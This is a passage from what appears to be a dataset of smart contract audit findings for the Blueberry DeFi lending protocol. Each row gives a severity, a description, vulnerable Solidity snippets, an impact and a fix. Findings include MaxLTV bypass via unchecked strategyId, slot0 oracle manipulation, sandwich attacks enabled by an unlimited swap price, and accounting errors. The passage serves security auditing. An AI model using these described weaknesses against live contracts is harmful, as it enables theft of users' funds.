token to repay to Compound\\namountLpWithdraw: the amount of the LP token to withdraw, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them for collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn in the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraw the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPay back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidate that this situation does not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow token that weren't paid back and withdrawn underlying tokens to the user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.",Add an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\n,Users who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.,"```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n" +Users can get around MaxLTV because of lack of strategyId validation,high,"When a user withdraws some of their underlying token, there is a check to ensure they still meet the Max LTV requirements. However, they are able to arbitrarily enter any `strategyId` that they would like for this check, which could allow them to exceed the LTV for their real strategy while passing the approval.\\nWhen a user calls `IchiVaultSpell.sol#reducePosition()`, it removes some of their underlying token from the vault, increasing the LTV of any loans they have taken.\\nAs a result, the `_validateMaxLTV(strategyId)` function is called to ensure they remain compliant with their strategy's specified LTV:\\n```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n\\nTo summarize, this check:\\nPulls the position's total debt value\\nPulls the position's total value of underlying tokens\\nPulls the specified maxLTV for this strategyId and underlying token combination\\nEnsures that `underlyingTokenValue * maxLTV > debtValue`\\nBut there is no check to ensure that this `strategyId` value corresponds to the strategy the user is actually invested in, as we can see the `reducePosition()` function:\\n```\\nfunction reducePosition(\\n uint256 strategyId,\\n address collToken,\\n uint256 collAmount\\n) external {\\n doWithdraw(collToken, collAmount);\\n doRefund(collToken);\\n _validateMaxLTV(strategyId);\\n}\\n```\\n\\nHere is a quick proof of concept to explain the risk:\\nLet's say a user deposits 1000 DAI as their underlying collateral.\\nThey are using a risky strategy (let's call it strategy 911) which requires a maxLTV of 2X (ie maxLTV[911][DAI] = 2e5)\\nThere is another safer strategy (let's call it strategy 411) which has a maxLTV of 5X (ie maxLTV[411][DAI] = 4e5)\\nThe user takes the max loan from the risky strategy, borrowing $2000 USD of value.\\nThey are not allowed to take any more loans from that strategy, or remove any of their collateral.\\nThen, they call `reducePosition()`, withdrawing 1600 DAI and entering `411` as the strategyId.\\nThe `_validateMaxLTV` check will happen on `strategyId = 411`, and will pass, but the result will be that the user now has only 400 DAI of underlying collateral protecting $2000 USD worth of the risky strategy, violating the LTV.","Issue Users can get around MaxLTV because of lack of strategyId validation\\nSince the collateral a position holds will always be the vault token of the strategy they have used, you can validate the `strategyId` against the user's collateral, as follows:\\n```\\naddress positionCollToken = bank.positions(bank.POSITION_ID()).collToken;\\naddress positionCollId = bank.positions(bank.POSITION_ID()).collId;\\naddress unwrappedCollToken = IERC20Wrapper(positionCollToken).getUnderlyingToken(positionCollId);\\nrequire(strategies[strategyId].vault == unwrappedCollToken, ""wrong strategy"");\\n```\\n","Users can get around the specific LTVs and create significantly higher leverage bets than the protocol has allowed. This could cause the protocol to get underwater, as the high leverage combined with risky assets could lead to dramatic price swings without adequate time for the liquidation mechanism to successfully protect solvency.","```\\nfunction _validateMaxLTV(uint256 strategyId) internal view {\\n uint256 debtValue = bank.getDebtValue(bank.POSITION_ID());\\n (, address collToken, uint256 collAmount, , , , , ) = bank\\n .getCurrentPositionInfo();\\n uint256 collPrice = bank.oracle().getPrice(collToken);\\n uint256 collValue = (collPrice * collAmount) /\\n 10**IERC20Metadata(collToken).decimals();\\n\\n if (\\n debtValue >\\n (collValue * maxLTV[strategyId][collToken]) / DENOMINATOR\\n ) revert EXCEED_MAX_LTV();\\n}\\n```\\n" +Users can be liquidated prematurely because calculation understates value of underlying position,high,"When the value of the underlying asset is calculated in `getPositionRisk()`, it uses the `underlyingAmount`, which is the amount of tokens initially deposited, without any adjustment for the interest earned. This can result in users being liquidated early, because the system undervalues their assets.\\nA position is considered liquidatable if it meets the following criteria:\\n```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n\\nThe value of the underlying tokens is a major factor in this calculation. However, the calculation of the underlying value is performed with the following function call:\\n```\\nuint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n);\\n```\\n\\nIf we trace it back, we can see that `pos.underlyingAmount` is set when `lend()` is called (ie when underlying assets are deposited). This is the only place in the code where this value is moved upward, and it is only increased by the amount deposited. It is never moved up to account for the interest payments made on the deposit, which can materially change the value.","Value of the underlying assets should be derived from the vault shares and value, rather than being stored directly.",Users can be liquidated prematurely because the value of their underlying assets are calculated incorrectly.,```\\n((borrowsValue - collateralValue) / underlyingValue) >= underlyingLiqThreshold\\n```\\n +Interest component of underlying amount is not withdrawable using the `withdrawLend` function. Such amount is permanently locked in the BlueBerryBank contract,high,"Soft vault shares are issued against interest bearing tokens issued by `Compound` protocol in exchange for underlying deposits. However, `withdrawLend` function caps the withdrawable amount to initial underlying deposited by user (pos.underlyingAmount). Capping underlying amount to initial underlying deposited would mean that a user can burn all his vault shares in `withdrawLend` function and only receive original underlying deposited.\\nInterest accrued component received from Soft vault (that rightfully belongs to the user) is no longer retrievable because the underlying vault shares are already burnt. Loss to the users is permanent as such interest amount sits permanently locked in Blueberry bank.\\n`withdrawLend` function in `BlueBerryBank` allows users to withdraw underlying amount from `Hard` or `Soft` vaults. `Soft` vault shares are backed by interest bearing `cTokens` issued by Compound Protocol\\nUser can request underlying by specifying `shareAmount`. When user tries to send the maximum `shareAmount` to withdraw all the lent amount, notice that the amount withdrawable is limited to the `pos.underlyingAmount` (original deposit made by the user).\\nWhile this is the case, notice also that the full `shareAmount` is deducted from `underlyingVaultShare`. User cannot recover remaining funds because in the next call, user doesn't have any vault shares against his address. Interest accrued component on the underlying that was returned by `SoftVault` to `BlueberryBank` never makes it back to the original lender.\\n```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n","Introduced a new variable to adjust positions & removed cap on withdraw amount.\\nHighlighted changes I recommend to withdrawLend with //******//.\\n```\\nfunction withdrawLend(address token, uint256 shareAmount)\\n external\\n override\\n inExec\\n poke(token)\\n {\\n Position storage pos = positions[POSITION_ID];\\n Bank storage bank = banks[token];\\n if (token != pos.underlyingToken) revert INVALID_UTOKEN(token);\\n \\n //*********-audit cap shareAmount to maximum value, pos.underlyingVaultShare*******\\n if (shareAmount > pos.underlyingVaultShare) {\\n shareAmount = pos.underlyingVaultShare;\\n }\\n\\n // if (shareAmount == type(uint256).max) {\\n // shareAmount = pos.underlyingVaultShare;\\n // } \\n\\n uint256 wAmount;\\n uint256 amountToOffset; //*********- audit added this to adjust position********\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n //*********- audit calculate amountToOffset********\\n //*********-audit not capping wAmount anymore*******\\n amountToOffset = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n //*********-audit subtract amountToOffset instead of wAmount*******\\n pos.underlyingAmount -= amountToOffset;\\n bank.totalLend -= amountToOffset;\\n\\n wAmount = doCutWithdrawFee(token, wAmount);\\n\\n IERC20Upgradeable(token).safeTransfer(msg.sender, wAmount);\\n }\\n```\\n","Every time, user withdraws underlying from a Soft vault, interest component gets trapped in BlueBerry contract. Here is a scenario.\\nAlice deposits 1000 USDC into `SoftVault` using the `lend` function of BlueberryBank at T=0\\nUSDC soft vault mints 1000 shares to Blueberry bank\\nUSDC soft vault deposits 1000 USDC into Compound & receives 1000 cUSDC\\nAlice at T=60 days requests withdrawal against 1000 Soft vault shares\\nSoft Vault burns 1000 soft vault shares and requests withdrawal from Compound against 1000 cTokens\\nSoft vault receives 1050 USDC (50 USDC interest) and sends this to BlueberryBank\\nBlueberry Bank caps the withdrawal amount to 1000 (original deposit)\\nBlueberry Bank deducts 0.5% withdrawal fees and deposits 995 USDC back to user\\nIn the whole process, Alice has lost access to 50 USDC.",```\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n +BlueBerryBank#withdrawLend will cause underlying token accounting error if soft/hard vault has withdraw fee,high,"Soft/hard vaults can have a withdraw fee. This takes a certain percentage from the user when they withdraw. The way that the token accounting works in BlueBerryBank#withdrawLend, it will only remove the amount returned by the hard/soft vault from pos.underlying amount. If there is a withdraw fee, underlying amount will not be decrease properly and the user will be left with phantom collateral that they can still use.\\n```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n\\nBoth SoftVault and HardVault implement a withdraw fee. Here we see that withdrawAmount (the return value) is decreased by the fee amount.\\n```\\n uint256 wAmount;\\n if (address(ISoftVault(bank.softVault).uToken()) == token) {\\n ISoftVault(bank.softVault).approve(\\n bank.softVault,\\n type(uint256).max\\n );\\n wAmount = ISoftVault(bank.softVault).withdraw(shareAmount);\\n } else {\\n wAmount = IHardVault(bank.hardVault).withdraw(token, shareAmount);\\n }\\n\\n wAmount = wAmount > pos.underlyingAmount\\n ? pos.underlyingAmount\\n : wAmount;\\n\\n pos.underlyingVaultShare -= shareAmount;\\n pos.underlyingAmount -= wAmount;\\n bank.totalLend -= wAmount;\\n```\\n\\nThe return value is stored as `wAmount` which is then subtracted from `pos.underlyingAmount` the issue is that the withdraw fee has now caused a token accounting error for `pos`. We see that the fee paid to the hard/soft vault is NOT properly removed from `pos.underlyingAmount`. This leaves the user with phantom underlying which doesn't actually exist but that the user can use to take out loans.\\nExmaple: For simplicity let's say that 1 share = 1 underlying and the soft/hard vault has a fee of 5%. Imagine a user deposits 100 underlying to receive 100 shares. Now the user withdraws their 100 shares while the hard/soft vault has a withdraw. This burns 100 shares and softVault/hardVault.withdraw returns 95 (100 - 5). During the token accounting pos.underlyingVaultShares are decreased to 0 but pos.underlyingAmount is still equal to 5 (100 - 95).\\n```\\n uint256 cv = oracle.getUnderlyingValue(\\n pos.underlyingToken,\\n pos.underlyingAmount\\n );\\n```\\n\\nThis accounting error is highly problematic because collateralValue uses pos.underlyingAmount to determine the value of collateral for liquidation purposes. This allows the user to take on more debt than they should.","`HardVault/SoftVault#withdraw` should also return the fee paid to the vault, so that it can be accounted for.",User is left with collateral that isn't real but that can be used to take out a loan,"```\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n```\\n" +IchiLpOracle is extemely easy to manipulate due to how IchiVault calculates underlying token balances,high,"`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. `slot0` is the most recent data point and is therefore extremely easy to manipulate. Given that the protocol specializes in leverage, the effects of this manipulation would compound to make malicious uses even easier.\\nICHIVault.sol\\n```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n\\n`IchiVault#getTotalAmounts` uses the `UniV3Pool.slot0` to determine the number of tokens it has in it's position. slot0 is the most recent data point and can easily be manipulated.\\n`IchiLPOracle` directly uses the token values returned by `vault#getTotalAmounts`. This allows a malicious user to manipulate the valuation of the LP. An example of this kind of manipulation would be to use large buys/sells to alter the composition of the LP to make it worth less or more.","Token balances should be calculated inside the oracle instead of getting them from the `IchiVault`. To determine the liquidity, use a TWAP instead of `slot0`.",Ichi LP value can be manipulated to cause loss of funds for the protocol and other users,"```\\nfunction _amountsForLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity\\n) internal view returns (uint256, uint256) {\\n (uint160 sqrtRatioX96, , , , , , ) = IUniswapV3Pool(pool).slot0();\\n return\\n UV3Math.getAmountsForLiquidity(\\n sqrtRatioX96,\\n UV3Math.getSqrtRatioAtTick(tickLower),\\n UV3Math.getSqrtRatioAtTick(tickUpper),\\n liquidity\\n );\\n}\\n```\\n" +IchiLpOracle returns inflated price due to invalid calculation,medium,"`IchiLpOracle` returns inflated price due to invalid calculation\\nIf you run the tests, then you can see that IchiLpOracle returns inflated price for the ICHI_USDC vault\\n```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n\\nAs the documentation says, the token price should be in USD with 18 decimals of precision. The price returned here is `1101189125194_558706411110851447` This is 1.1 trillion USD when considering the 18 decimals.\\nThe test uses real values except for mocking ichi and usdc price, which are returned by the mock with correct decimals (1e18 and 1e6)",Issue IchiLpOracle returns inflated price due to invalid calculation\\nFix the LP token price calculation. The problem is that you multiply totalReserve with extra 1e18 (return (totalReserve * 1e18) / totalSupply;).,`IchiLpOracle` price is used in `_validateMaxLTV` (collToken is the vault). Therefore the collateral value is inflated and users can open bigger positions than their collateral would normally allow.,```\\nSTATICCALL IchiLpOracle.getPrice(token=0xFCFE742e19790Dd67a627875ef8b45F17DB1DaC6) => (1101189125194558706411110851447)\\n```\\n +"totalLend isn't updated on liquidation, leading to permanently inflated value",medium,"`bank.totalLend` tracks the total amount that has been lent of a given token, but it does not account for tokens that are withdrawn when a position is liquidated. As a result, the value will become overstated, leading to inaccurate data on the pool.\\nWhen a user lends a token to the Compound fork, the bank for that token increases its `totalLend` parameter:\\n```\\nbank.totalLend += amount;\\n```\\n\\nSimilarly, this value is decreased when the amount is withdrawn.\\nIn the event that a position is liquidated, the `underlyingAmount` and `underlyingVaultShare` for the user are decreased based on the amount that will be transferred to the liquidator.\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n```\\n\\nHowever, the liquidator doesn't receive those shares ""inside the system"". Instead, they receive the softVault tokens that can be claimed directly for the underlying asset by calling `withdraw()`, which simply redeems the underlying tokens from the Compound fork and sends them to the user.\\n```\\nfunction withdraw(uint256 shareAmount)\\n external\\n override\\n nonReentrant\\n returns (uint256 withdrawAmount)\\n{\\n if (shareAmount == 0) revert ZERO_AMOUNT();\\n\\n _burn(msg.sender, shareAmount);\\n\\n uint256 uBalanceBefore = uToken.balanceOf(address(this));\\n if (cToken.redeem(shareAmount) != 0) revert REDEEM_FAILED(shareAmount);\\n uint256 uBalanceAfter = uToken.balanceOf(address(this));\\n\\n withdrawAmount = uBalanceAfter - uBalanceBefore;\\n // Cut withdraw fee if it is in withdrawVaultFee Window (2 months)\\n if (\\n block.timestamp <\\n config.withdrawVaultFeeWindowStartTime() +\\n config.withdrawVaultFeeWindow()\\n ) {\\n uint256 fee = (withdrawAmount * config.withdrawVaultFee()) /\\n DENOMINATOR;\\n uToken.safeTransfer(config.treasury(), fee);\\n withdrawAmount -= fee;\\n }\\n uToken.safeTransfer(msg.sender, withdrawAmount);\\n\\n emit Withdrawn(msg.sender, withdrawAmount, shareAmount);\\n}\\n```\\n\\nNowhere in this process is `bank.totalLend` updated. As a result, each time there is a liquidation of size X, `bank.totalLend` will move X higher relative to the correct value. Slowly, over time, this value will begin to dramatically misrepresent the accurate amount that has been lent.\\nWhile there is no material exploit based on this inaccuracy at the moment, this is a core piece of data in the protocol, and it's inaccuracy could lead to major issues down the road.\\nFurthermore, it will impact immediate user behavior, as the Blueberry devs have explained ""we use that [value] to help us display TVL with subgraph"", which will deceive and confuse users.","Issue totalLend isn't updated on liquidation, leading to permanently inflated value\\nFor the best accuracy, updating `bank.totalLend` should happen from the `withdraw()` function in `SoftVault.sol` instead of from the core `BlueberryBank.sol` contract.\\nAlternatively, you could add an update to `bank.totalLend` in the `liquidate()` function, which might temporarily underrepresent the total lent before the liquidator withdrew the funds, but would end up being accurate over the long run.","A core metric of the protocol will be permanently inaccurate, giving users incorrect data to make their assessments on and potentially causing more severe issues down the road.",```\\nbank.totalLend += amount;\\n```\\n +"Complete debt size is not paid off for fee on transfer tokens, but users aren't warned",medium,"The protocol seems to be intentionally catering to fee on transfer tokens by measuring token balances before and after transfers to determine the value received. However, the mechanism to pay the full debt will not succeed in paying off the debt if it is used with a fee on transfer token.\\nThe protocol is clearly designed to ensure it is compatible with fee on transfer tokens. For example, all functions that receive tokens check the balance before and after, and calculate the difference between these values to measure tokens received:\\n```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n\\nThere is another feature of the protocol, which is that when loans are being repaid, the protocol gives the option of passing `type(uint256).max` to pay your debt in full:\\n```\\nif (amountCall == type(uint256).max) {\\n amountCall = oldDebt;\\n}\\n```\\n\\nHowever, these two features are not compatible. If a user paying off fee on transfer tokens passes in `type(uint256).max` to pay their debt in full, the full amount of their debt will be calculated. But when that amount is transferred to the contract, the amount that the result increases will be slightly less. As a result, the user will retain some balance that is not paid off.","I understand that it would be difficult to implement a mechanism to pay fee on transfer tokens off in full. That adds a lot of complexity that is somewhat fragile.\\nThe issue here is that the failure is silent, so that users request to pay off their loan in full, get confirmation, and may not realize that the loan still has an outstanding balance with interest accruing.\\nTo solve this, there should be a confirmation that any user who passes `type(uint256).max` has paid off their debt in full. Otherwise, the function should revert, so that users paying fee on transfer tokens know that they cannot use the ""pay in full"" feature and must specify the correct amount to get their outstanding balance down to zero.","The feature to allow loans to be paid in full will silently fail when used with fee on transfer tokens, which may trick users into thinking they have completely paid off their loans, and accidentally maintaining a balance.","```\\nfunction doERC20TransferIn(address token, uint256 amountCall)\\n internal\\n returns (uint256)\\n{\\n uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n IERC20Upgradeable(token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amountCall\\n );\\n uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(\\n address(this)\\n );\\n return balanceAfter - balanceBefore;\\n}\\n```\\n" +HardVault never deposits assets to Compound,medium,"While the protocol states that all underlying assets are deposited to their Compound fork to earn interest, it appears this action never happens in `HardVault.sol`.\\nThe documentation and comments seem to make clear that all assets deposited to `HardVault.sol` should be deposited to Compound to earn yield:\\n```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n\\nHowever, if we examine the code in these functions, there is no movement of the assets to Compound. Instead, they sit in the Hard Vault and doesn't earn any yield.","Either add the functionality to the Hard Vault to have the assets pulled from the ERC1155 and deposited to the Compound fork, or change the comments and docs to be clear that such underlying assets will not be receiving any yield.",Users who may expect to be earning yield on their underlying tokens will not be.,"```\\n/**\\n * @notice Deposit underlying assets on Compound and issue share token\\n * @param amount Underlying token amount to deposit\\n * @return shareAmount cToken amount\\n */\\nfunction deposit(address token, uint256 amount) { // rest of code }\\n\\n/**\\n * @notice Withdraw underlying assets from Compound\\n * @param shareAmount Amount of cTokens to redeem\\n * @return withdrawAmount Amount of underlying assets withdrawn\\n */\\nfunction withdraw(address token, uint256 shareAmount) { // rest of code }\\n```\\n" +"Withdrawals from IchiVaultSpell have no slippage protection so can be frontrun, stealing all user funds",medium,"When a user withdraws their position through the `IchiVaultSpell`, part of the unwinding process is to trade one of the released tokens for the other, so the borrow can be returned. This trade is done on Uniswap V3. The parameters are set in such a way that there is no slippage protection, so any MEV bot could see this transaction, aggressively sandwich attack it, and steal the majority of the user's funds.\\nUsers who have used the `IchiVaultSpell` to take positions in Ichi will eventually choose to withdraw their funds. They can do this by calling `closePosition()` or `closePositionFarm()`, both of which call to `withdrawInternal()`, which follows loosely the following logic:\\nsends the LP tokens back to the Ichi vault for the two underlying tokens (one of which was what was borrowed)\\nswaps the non-borrowed token for the borrowed token on UniV3, to ensure we will be able to pay the loan back\\nwithdraw our underlying token from the Compound fork\\nrepay the borrow token loan to the Compound fork\\nvalidate that we are still under the maxLTV for our strategy\\nsend the funds (borrow token and underlying token) back to the user\\nThe issue exists in the swap, where Uniswap is called with the following function:\\n```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n\\nThe 4th variable is called `sqrtPriceLimitX96` and it represents the square root of the lowest or highest price that you are willing to perform the trade at. In this case, we've hardcoded in that we are willing to take the worst possible rate (highest price in the event we are trading 1 => 0; lowest price in the event we are trading 0 => 1).\\nThe `IchiVaultSpell.sol#uniswapV3SwapCallback()` function doesn't enforce any additional checks. It simply sends whatever delta is requested directly to Uniswap.\\n```\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n if (msg.sender != address(swapPool)) revert NOT_FROM_UNIV3(msg.sender);\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token0()).safeTransfer(\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token0()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount0Delta)\\n );\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n IERC20Upgradeable(swapPool.token1()).safeTransfer(\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n } else {\\n IERC20Upgradeable(swapPool.token1()).safeTransferFrom(\\n payer,\\n msg.sender,\\n uint256(amount1Delta)\\n );\\n }\\n }\\n}\\n```\\n\\nWhile it is true that there is an `amountRepay` parameter that is inputted by the user, it is not sufficient to protect users. Many users will want to make only a small repayment (or no repayment) while unwinding their position, and thus this variable will only act as slippage protection in the cases where users intend to repay all of their returned funds.\\nWith this knowledge, a malicious MEV bot could watch for these transactions in the mempool. When it sees such a transaction, it could perform a ""sandwich attack"", trading massively in the same direction as the trade in advance of it to push the price out of whack, and then trading back after us, so that they end up pocketing a profit at our expense.","Have the user input a slippage parameter to ensure that the amount of borrowed token they receive back from Uniswap is in line with what they expect.\\nAlternatively, use the existing oracle system to estimate a fair price and use that value in the `swap()` call.","Users withdrawing their funds through the `IchiVaultSpell` who do not plan to repay all of the tokens returned from Uniswap could be sandwich attacked, losing their funds by receiving very little of their borrowed token back from the swap.","```\\nif (amountToSwap > 0) {\\n swapPool = IUniswapV3Pool(vault.pool());\\n swapPool.swap(\\n address(this),\\n !isTokenA,\\n int256(amountToSwap),\\n isTokenA\\n ? UniV3WrappedLibMockup.MAX_SQRT_RATIO - 1 \\n : UniV3WrappedLibMockup.MIN_SQRT_RATIO + 1, \\n abi.encode(address(this))\\n );\\n}\\n```\\n" +BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee,medium,"BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\n```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n\\nThis function is called in order to get fee from ICHI rewards, collected by farming. But currently it takes `bank.config().depositFee()` instead of `bank.config().withdrawFee()`.",Issue BasicSpell.doCutRewardsFee uses depositFee instead of withdraw fee\\nTake withdraw fee from rewards.,Wrong fee amount is taken.,"```\\n function doCutRewardsFee(address token) internal {\\n if (bank.config().treasury() == address(0)) revert NO_TREASURY_SET();\\n\\n\\n uint256 balance = IERC20Upgradeable(token).balanceOf(address(this));\\n if (balance > 0) {\\n uint256 fee = (balance * bank.config().depositFee()) / DENOMINATOR;\\n IERC20Upgradeable(token).safeTransfer(\\n bank.config().treasury(),\\n fee\\n );\\n\\n\\n balance -= fee;\\n IERC20Upgradeable(token).safeTransfer(bank.EXECUTOR(), balance);\\n }\\n }\\n```\\n" +ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer,medium,"Chainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded.\\nChainlinkAdapterOracle uses the ChainlinkFeedRegistry to obtain the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData pulls the associated aggregator and requests round data from it. ChainlinkAggregators have minPrice and maxPrice circuit breakers built into them. This means that if the price of the asset drops below the minPrice, the protocol will continue to value the token at minPrice instead of it's actual value. This will allow users to take out huge amounts of bad debt and bankrupt the protocol.\\nExample: TokenA has a minPrice of $1. The price of TokenA drops to $0.10. The aggregator still returns $1 allowing the user to borrow against TokenA as if it is $1 which is 10x it's actual value.\\nNote: Chainlink oracles are used a just one piece of the OracleAggregator system and it is assumed that using a combination of other oracles, a scenario like this can be avoided. However this is not the case because the other oracles also have their flaws that can still allow this to be exploited. As an example if the chainlink oracle is being used with a UniswapV3Oracle which uses a long TWAP then this will be exploitable when the TWAP is near the minPrice on the way down. In a scenario like that it wouldn't matter what the third oracle was because it would be bypassed with the two matching oracles prices. If secondary oracles like Band are used a malicious user could DDOS relayers to prevent update pricing. Once the price becomes stale the chainlink oracle would be the only oracle left and it's price would be used.","Issue ChainlinkAdapterOracle will return the wrong price for asset if underlying aggregator hits minAnswer\\nChainlinkAdapterOracle should check the returned answer against the minPrice/maxPrice and revert if the answer is outside of the 